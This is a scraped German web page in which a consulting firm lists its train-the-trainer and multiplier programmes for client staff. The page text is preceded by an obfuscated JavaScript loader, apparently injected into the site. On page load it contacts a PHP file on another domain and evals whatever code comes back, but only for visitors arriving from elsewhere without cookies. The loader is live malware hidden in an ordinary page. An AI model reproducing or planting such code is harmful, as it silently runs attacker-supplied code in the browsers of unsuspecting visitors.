;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.soencksen.de/lernplattform/admin/classes/local/settings/settings.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Damit Projektergebnisse langfristig und nachhaltig wirken, ist es häufig angebracht, einen erweiterten Know-how-Transfer vorzunehmen: Wir bieten an, Mitarbeiter/-innen unserer Kunden zu befähigen, ihrerseits als interne Trainer, Berater oder Multiplikatoren bestimmter Themen in ihrer Organisation aktiv zu sein.

 

Auf diese Weise gelingt es auch bei großen Projekten, anfängliche Erfolge in dauerhafte Gewinne zu überführen, ohne dabei von externer Beratung abhängig zu bleiben. Zu den Themenfeldern der nebenstehenden Liste führten wir Train-the-Trainer- und Multiplikatorenausbildungen für unsere Kunden durch (jeweils mehrfach).

Beispielhafte Liste durchgeführter Train-the-Trainer- und Multiplikatorenausbildungen (Auszug):

  • Ausbildung interner Change Agents
  • Lehrcoach-Ausbildung für systemisches Coaching
  • Auswahl und Ausbildung interner Führungsfeedback-Moderator(inn)en
  • Fortbildung interner Multiplikator(inn)en für kollegiale Fallberatung
  • Trainer- und Moderationsausbildung
  • Ausbildung interner Konfliktmanager/-innen
  • Qualifizierung interner Evaluationsberater/-innen